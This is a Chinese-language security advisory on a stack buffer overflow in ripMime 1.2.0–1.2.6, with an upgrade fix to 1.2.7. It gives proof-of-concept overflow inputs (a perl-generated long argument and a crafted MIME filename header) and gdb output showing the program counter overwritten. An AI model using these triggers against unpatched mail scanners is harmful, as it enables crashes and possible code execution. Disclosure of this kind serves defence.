xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

RipMime Mime头处理超长文件名存在缓冲溢出


发布时间:2002-01-28
更新时间:2002-01-28
严重程度:
威胁程度:权限提升
错误类型:边界检查错误
利用方式:服务器模式

BUGTRAQ ID:3941

受影响系统
plDaniels ripMime 1.2.0
plDaniels ripMime 1.2.1
plDaniels ripMime 1.2.2
plDaniels ripMime 1.2.3
plDaniels ripMime 1.2.4
   - FreeBSD FreeBSD 5.0
   + plDaniels Inflex 1.0.10
plDaniels ripMime 1.2.5
   + plDaniels Inflex 1.0.11
plDaniels ripMime 1.2.6
   + plDaniels Inflex 1.0.11
详细描述
ripMime 是Inflex EMAIL病毒扫描程序中的小工具。也包含在商业版本XaMime
程序中。

其中ripMime在处理文件名的时候,如果对命令行开关传递超过2079+的文件名
给参数,就可以导致堆栈破坏,缓冲溢出。造成权利提升。

测试代码
如下可造成64解码错误:

./ripmime -i mail -d `perl -e 'print "A" x 255'`
Error: Cannot open output file
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_
for BASE64 decoding.Segmentation fault

我们可以使用带不正确的BASE64文件名头来触发缓冲溢出如:

Content-Type: application/octet-stream;
name="blah"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=AAAAAAAAAAAAAAAAAAA....<2000 total chars>

使用GBD我们可以看到如下寄存器被破坏:

(gdb) r -i mail -d `perl -e 'print "A" x 79'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/ripmime-1.2.6/./ripmime -i mail -d `perl -e 'print "A" x 79'`
Error: Cannot open output file
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_
for BASE64 decoding.
Program received signal SIGILL, Illegal instruction.
0x4141415c in ?? ()

...

r0             0x4141415f       1094795615  
r19            0x41414141       1094795585
r20            0x41414141       1094795585
r21            0x41414141       1094795585
r22            0x41414141       1094795585
r23            0x41414141       1094795585
r24            0x41414141       1094795585
r25            0x41414141       1094795585
r26            0x41414141       1094795585
r27            0x41414141       1094795585
r28            0x41414141       1094795585
r29            0x41414141       1094795585
r30            0x41414141       1094795585
r31            0x41414141       1094795585
pc             0x4141415c       1094795612
lr             0x4141415f       1094795615

解决方案
请升级到版本1.2.7以上:

plDaniels ripMime 1.2.0:

plDaniels Upgrade ripmime-1.2.7.tar.gz
http://pldaniels.org/ripmime/ripmime-1.2.7.tar.gz

plDaniels ripMime 1.2.1:

plDaniels Upgrade ripmime-1.2.7.tar.gz
http://pldaniels.org/ripmime/ripmime-1.2.7.tar.gz

plDaniels ripMime 1.2.2:

plDaniels Upgrade ripmime-1.2.7.tar.gz
http://pldaniels.org/ripmime/ripmime-1.2.7.tar.gz

plDaniels ripMime 1.2.3:

plDaniels Upgrade ripmime-1.2.7.tar.gz
http://pldaniels.org/ripmime/ripmime-1.2.7.tar.gz

plDaniels ripMime 1.2.4:

plDaniels Upgrade ripmime-1.2.7.tar.gz
http://pldaniels.org/ripmime/ripmime-1.2.7.tar.gz

plDaniels ripMime 1.2.5:

plDaniels Upgrade ripmime-1.2.7.tar.gz
http://pldaniels.org/ripmime/ripmime-1.2.7.tar.gz

plDaniels ripMime 1.2.6:

plDaniels Upgrade ripmime-1.2.7.tar.gz
http://pldaniels.org/ripmime/ripmime-1.2.7.tar.gz

相关信息
KF <dotslash@snosoft.com>.
参考:http://www.securityfocus.com/archive/1/251989
相关主页:http://pldaniels.org/ripmime/#workswith
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved